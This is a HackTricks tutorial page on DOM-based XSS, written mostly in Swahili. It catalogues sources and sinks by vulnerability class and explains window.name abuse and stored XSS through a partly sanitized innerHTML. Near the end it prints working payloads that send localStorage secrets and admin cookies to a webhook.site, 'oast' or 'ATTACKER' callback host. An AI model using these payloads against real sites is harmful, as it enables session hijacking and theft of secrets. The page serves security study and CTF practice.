HackTricks
DOM XSS
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Udhaifu za DOM
Udhaifu za DOM hutokea wakati data kutoka kwa sources zinazodhibitiwa na washambuliaji (kama location.search, document.referrer, au document.cookie) inapotumwa kwa usalama duni kwenda kwa sinks. Sinks ni functions au objects (mfano, eval(), document.body.innerHTML) ambazo zinaweza kutekeleza au kuonyesha yaliyomo hatarishi ikiwa zitapewa data yenye madhuni.
- Sources ni pembejeo ambazo zinaweza kudhibitiwa na washambuliaji, zikiwemo URLs, cookies, na jumbe za wavuti.
- Sinks ni endpoints zenye hatari ambapo data yenye madhuni inaweza kusababisha madhara, kama utekelezaji wa script.
Hatari hutokea wakati data inapita kutoka kwa sources hadi sinks bila uhakiki au kusafishwa ipasavyo, ikiruhusu mashambulizi kama XSS.
Tip
Unaweza kupata orodha iliyosasishwa zaidi ya sources na sinks katika https://github.com/wisec/domxsswiki/wiki
Common sources:
document.URL
document.documentURI
document.URLUnencoded
document.baseURI
location
document.cookie
document.referrer
window.name
history.pushState
history.replaceState
localStorage
sessionStorage
IndexedDB(mozIndexedDB, webkitIndexedDB, msIndexedDB)
Database
Sinki za Kawaida:
| Open Redirect | Javascript Injection | DOM-data manipulation | jQuery |
|---|---|---|---|
location | eval() | scriptElement.src | add() |
location.host | Function() constructor | scriptElement.text | after() |
location.hostname | setTimeout() | scriptElement.textContent | append() |
location.href | setInterval() | scriptElement.innerText | animate() |
location.pathname | setImmediate() | someDOMElement.setAttribute() | insertAfter() |
location.search | execCommand() | someDOMElement.search | insertBefore() |
location.protocol | execScript() | someDOMElement.text | before() |
location.assign() | msSetImmediate() | someDOMElement.textContent | html() |
location.replace() | range.createContextualFragment() | someDOMElement.innerText | prepend() |
open() | crypto.generateCRMFRequest() | someDOMElement.outerText | replaceAll() |
domElem.srcdoc | ``Local file-path manipulation | someDOMElement.value | replaceWith() |
XMLHttpRequest.open() | FileReader.readAsArrayBuffer() | someDOMElement.name | wrap() |
XMLHttpRequest.send() | FileReader.readAsBinaryString() | someDOMElement.target | wrapInner() |
jQuery.ajax() | FileReader.readAsDataURL() | someDOMElement.method | wrapAll() |
$.ajax() | FileReader.readAsText() | someDOMElement.type | has() |
| ``Ajax request manipulation | FileReader.readAsFile() | someDOMElement.backgroundImage | constructor() |
XMLHttpRequest.setRequestHeader() | FileReader.root.getFile() | someDOMElement.cssText | init() |
XMLHttpRequest.open() | FileReader.root.getFile() | someDOMElement.codebase | index() |
XMLHttpRequest.send() | Link manipulation | someDOMElement.innerHTML | jQuery.parseHTML() |
jQuery.globalEval() | someDOMElement.href | someDOMElement.outerHTML | $.parseHTML() |
$.globalEval() | someDOMElement.src | someDOMElement.insertAdjacentHTML | Client-side JSON injection |
| ``HTML5-storage manipulation | someDOMElement.action | someDOMElement.onevent | JSON.parse() |
sessionStorage.setItem() | XPath injection | document.write() | jQuery.parseJSON() |
localStorage.setItem() | document.evaluate() | document.writeln() | $.parseJSON() |
**[**`Denial of Service`**](dom-xss.md#denial-of-service)** | someDOMElement.evaluate() | document.title | ``Cookie manipulation |
requestFileSystem() | ``Document-domain manipulation | document.implementation.createHTMLDocument() | document.cookie |
RegExp() | document.domain | history.pushState() | WebSocket-URL poisoning |
| Client-Side SQl injection | Web-message manipulation | history.replaceState() | WebSocket |
executeSql() | postMessage() | `` | `` |
The innerHTML sink haitakubali elementi za script katika browser yoyote ya kisasa, na hata matukio ya svg onload hayatofanya kazi. Hii inamaanisha utahitaji kutumia vipengele mbadala kama img au iframe.
Aina hii ya XSS labda ndiyo ngumu zaidi kugundua, kwani unahitaji kutazama ndani ya msimbo wa JS, uone ikiwa inacho kutumia kitu chochote ambacho thamani yake unayodhibiti, na katika kesi hiyo, uone ikiwa kuna njia yoyote ya kuitumia vibaya ili kutekeleza JS ya hiari.
Zana za kuzipata
- https://github.com/mozilla/eslint-plugin-no-unsanitized
- Extension ya browser ili kukagua kila data inayofika kwenye sinki inayoweza kutumika: https://github.com/kevin-mizu/domloggerpp
Mifano
Open Redirect
Kutoka: https://portswigger.net/web-security/dom-based/open-redirection
Udhaifu wa Open redirect katika DOM hutokea wakati script inaandika data, ambayo mshambuliaji anaweza kuidhibiti, ndani ya sinki inayoweza kuanzisha uelekezaji kwa domain nyingine.
Ni muhimu kuelewa kwamba kutekeleza msimbo wowote, kama javascript:alert(1), inawezekana ikiwa una udhibiti wa mwanzo wa URL ambapo uelekezaji unafanyika.
Sinki:
location
location.host
location.hostname
location.href
location.pathname
location.search
location.protocol
location.assign()
location.replace()
open()
domElem.srcdoc
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.ajax()
$.ajax()
Cookie manipulation
Chanzo: https://portswigger.net/web-security/dom-based/cookie-manipulation
Udhaifu wa DOM-based cookie-manipulation hutokea wakati script inaingiza data, ambayo inaweza kudhibitiwa na attacker, katika thamani ya cookie. Udhaifu huu unaweza kusababisha tabia isiyotarajiwa ya ukurasa wa wavuti ikiwa cookie inatumiwa ndani ya tovuti. Aidha, unaweza kutumika kutekeleza session fixation attack ikiwa cookie inahusishwa na ufuatiliaji wa sessions za watumiaji. Sink kuu inayohusiana na udhaifu huu ni:
Sinks:
document.cookie
JavaScript Injection
From: https://portswigger.net/web-security/dom-based/javascript-injection
Upungufu za DOM-based JavaScript injection hutokea wakati script inaendesha data, ambayo inaweza kudhibitiwa na mshambuliaji, kama msimbo wa JavaScript.
Sinks:
eval()
Function() constructor
setTimeout()
setInterval()
setImmediate()
execCommand()
execScript()
msSetImmediate()
range.createContextualFragment()
crypto.generateCRMFRequest()
Document-domain manipulation
Chanzo: https://portswigger.net/web-security/dom-based/document-domain-manipulation
Document-domain manipulation vulnerabilities hutokea wakati script inaweka mali ya document.domain kwa kutumia data ambayo mshambuliaji anaweza kudhibiti.
Mali ya document.domain ina jukumu muhimu katika utekelezaji wa same-origin policy na vivinjari. Wakati kurasa mbili kutoka origins tofauti zinapoweka document.domain kwa thamani ile ile, zinaweza kuingiliana bila vikwazo. Ingawa vivinjari vinaweka vikwazo fulani kwa thamani zinazoweza kuteuliwa kwa document.domain, kuzuia kuteuliwa kwa thamani zisizo sambamba kabisa na origin halisi ya ukurasa, bado kuna exceptions. Kwa kawaida, vivinjari huruhusu matumizi ya child au parent domains.
Sinks:
document.domain
WebSocket-URL poisoning
From: https://portswigger.net/web-security/dom-based/websocket-url-poisoning
WebSocket-URL poisoning hutokea wakati script inapotumia controllable data as the target URL kwa muunganisho wa WebSocket.
Sinks:
Constructor ya WebSocket inaweza kusababisha WebSocket-URL poisoning vulnerabilities.
Link manipulation
From: https://portswigger.net/web-security/dom-based/link-manipulation
DOM-based link-manipulation vulnerabilities hutokea wakati script inaandika attacker-controllable data to a navigation target ndani ya ukurasa wa sasa, kama clickable link au submission URL ya form.
Sinks:
someDOMElement.href
someDOMElement.src
someDOMElement.action
Udhibiti wa maombi ya Ajax
Chanzo: https://portswigger.net/web-security/dom-based/ajax-request-header-manipulation
Udhaifu wa udhibiti wa maombi ya Ajax hutokea wakati script inaandika data inayodhibitiwa na mshambuliaji ndani ya ombi la Ajax ambalo limetumwa kwa kutumia XmlHttpRequest object.
Sinks:
XMLHttpRequest.setRequestHeader()
XMLHttpRequest.open()
XMLHttpRequest.send()
jQuery.globalEval()
$.globalEval()
Local file-path manipulation
Chanzo: https://portswigger.net/web-security/dom-based/local-file-path-manipulation
Local file-path manipulation vulnerabilities hutokea wakati script inapitisha attacker-controllable data to a file-handling API kama parameter filename. Udhaifu huu unaweza kutumiwa na attacker kujenga URL ambayo, ikiwa itatembelewa na mtumiaji mwingine, inaweza kusababisha kivinjari cha mtumiaji kufungua au kuandika faili yoyote ya ndani.
Sinks:
FileReader.readAsArrayBuffer()
FileReader.readAsBinaryString()
FileReader.readAsDataURL()
FileReader.readAsText()
FileReader.readAsFile()
FileReader.root.getFile()
FileReader.root.getFile()
Client-Side SQl injection
Chanzo: https://portswigger.net/web-security/dom-based/client-side-sql-injection
Client-side SQL-injection vulnerabilities hutokea wakati script inapoingiza attacker-controllable data into a client-side SQL query in an unsafe way.
Sinks:
executeSql()
HTML5-storage manipulation
Chanzo: https://portswigger.net/web-security/dom-based/html5-storage-manipulation
HTML5-storage manipulation vulnerabilities hutokea wakati script inahifadhi data inayoweza kudhibitiwa na mshambuliaji katika HTML5 storage ya kivinjari cha wavuti (localStorage au sessionStorage). Ingawa hatua hii si hitilafu ya usalama kwa asili yake, inakuwa tatizo endapo programu kisha inasoma data iliyohifadhiwa na kuichakata kwa njia isiyo salama. Hii inaweza kumruhusu mshambuliaji kutumia mekanismo ya storage kutekeleza mashambulizi mengine ya DOM-based, kama vile cross-site scripting na JavaScript injection.
Sinks:
sessionStorage.setItem()
localStorage.setItem()
XPath injection
Chanzo: https://portswigger.net/web-security/dom-based/client-side-xpath-injection
DOM-based XPath-injection vulnerabilities hutokea wakati script inaingiza attacker-controllable data into an XPath query.
Sinks:
document.evaluate()
someDOMElement.evaluate()
Client-side JSON injection
Chanzo: https://portswigger.net/web-security/dom-based/client-side-json-injection
DOM-based JSON-injection vulnerabilities hutokea wakati script inajumuisha attacker-controllable data ndani ya string inayotafsiriwa kama muundo wa data wa JSON kisha kuchakatwa na application.
Sinks:
JSON.parse()
jQuery.parseJSON()
$.parseJSON()
Web-message manipulation
Chanzo: https://portswigger.net/web-security/dom-based/web-message-manipulation
Web-message vulnerabilities hutokea wakati script inapotuma attacker-controllable data as a web message to another document ndani ya browser. Mfano wa vulnerable Web-message manipulation unaweza kupatikana kwenye PortSwigger’s Web Security Academy.
Sinks:
The postMessage() method for sending web messages can lead to vulnerabilities if the event listener for receiving messages handles the incoming data in an unsafe way.
DOM-data manipulation
Chanzo: https://portswigger.net/web-security/dom-based/dom-data-manipulation
DOM-data manipulation vulnerabilities hutokea wakati script inaandika attacker-controllable data to a field within the DOM ambayo inatumika ndani ya UI inayoonekana au client-side logic. Udhaifu huu unaweza kutumiwa na mshambuliaji kujenga URL ambayo, iwapo itembelewa na mtumiaji mwingine, inaweza kubadilisha muonekano au tabia ya client-side UI.
Sinks:
scriptElement.src
scriptElement.text
scriptElement.textContent
scriptElement.innerText
someDOMElement.setAttribute()
someDOMElement.search
someDOMElement.text
someDOMElement.textContent
someDOMElement.innerText
someDOMElement.outerText
someDOMElement.value
someDOMElement.name
someDOMElement.target
someDOMElement.method
someDOMElement.type
someDOMElement.backgroundImage
someDOMElement.cssText
someDOMElement.codebase
document.title
document.implementation.createHTMLDocument()
history.pushState()
history.replaceState()
Denial of Service
Chanzo: https://portswigger.net/web-security/dom-based/denial-of-service
DOM-based denial-of-service vulnerabilities hutokea wakati script inapitisha attacker-controllable data unsafely to a problematic platform API. Hii inajumuisha APIs ambazo, zinapoitwa, zinaweza kusababisha kompyuta ya mtumiaji kutumia idadi kubwa sana za CPU au nafasi ya diski. Uhitilafu hizo zinaweza kuwa na athari kubwa za pembeni, kama vile kivinjari kikizuia utendakazi wa tovuti kwa kukataa majaribio ya kuhifadhi data katika localStorage au kusitisha scripts zinazofanya kazi nyingi.
Sinks:
requestFileSystem()
RegExp()
Dom Clobbering
Implicit globals & window.name abuse
Rejea name bila kutangaza (var/let/const) hurejea window.name. Kwa sababu window.name hudumu kupitia navigations za cross-origin, mwasi-hasidi anaweza kuandaa awali jina la browsing context kwa HTML/JS na baadaye msimbo wa mwathirika ukautumia kama data inayotegemewa:
- Fungua/elekeza target katika named context unayodhibiti:
<iframe name="<img src=x onerror=fetch('https://oast/?f='+btoa(localStorage.flag))>" src="https://target/page"></iframe>
- Au tumia tena
window.openkwa jina la target iliyoundwa:
window.open('https://target/page', "<svg/onload=alert(document.domain)>")
Ikiwa programu baadaye inafanya element.innerHTML = name (au sink inayofanana) bila kusafisha, attacker-controlled window.name string itaendeshwa katika target origin, ikiruhusu DOM XSS na access to same-origin storage.
Mtiririko wa Admin/automation: pre-seeded storage & javascript: navigation
Automation bots (kwa mfano, Playwright) mara nyingi hufanya ziara kwenye ukurasa wa ndani kwanza, huweka siri katika localStorage/cookies, kisha huvinjari kwenda URLs zilizotolewa na mtumiaji. Kila DOM XSS primitive (ikiwa ni pamoja na window.name abuse) katika mtiririko huo inaweza exfiltrate siri iliyowekwa:
fetch('https://webhook.site/<id>?flag=' + encodeURIComponent(localStorage.getItem('flag')))
Ikiwa bot haitazuia schemes, kutoa URL ya javascript: (javascript:fetch(...)) hufanya kutekelezwa katika origin ya sasa bila kuvinjari upya, na kusababisha leak ya thamani za storage.
Template literal innerHTML + pengo la kusafisha sehemu
Frontends ambazo husafisha tu mashamba yaliyoteuliwa lakini bado huingiza moja isiyoaminika moja kwa moja ndani ya innerHTML zinaweza kutumiwa kwa urahisi. Mfano:
fetch(`${window.location.origin}/admin/bug_reports`).then(r => r.json()).then(reports => {
reports.forEach(report => {
reportCard.innerHTML = `
<div>${DOMPurify.sanitize(report.id)}</div>
<div>${report.details}</div> <!-- unsanitized sink -->
`;
});
});
Ikiwa shamba lisilosafishwa limehifadhiwa upande wa server (kwa mfano, bug report “details”), payload inakuwa stored DOM XSS kwa mtazamaji yeyote mwenye ruhusa wa orodha. Payload rahisi kama <img src=x onerror=fetch('http://ATTACKER/?c='+document.cookie)> hufanya execute wakati admin anafungua ukurasa na hupeleka cookies zao.
Wakati app kwa uwazi inapozima SESSION_COOKIE_HTTPONLY (kwa mfano, Flask app.config['SESSION_COOKIE_HTTPONLY'] = False), cookie iliyotekwa mara moja inampa admin session hata kama signing secret inageuka kila kuanzisha tena (random secret_key inazuia forging, lakini theft bado inafanya kazi).
Marejeo
- Flagvent 2025 (Medium) — pink, Santa’s Wishlist, Christmas Metadata, Captured Noise
- HTB: Imagery (stored DOM XSS via partial DOMPurify + session theft)
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
Jifunze na fanya mazoezi ya GCP Hacking:Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.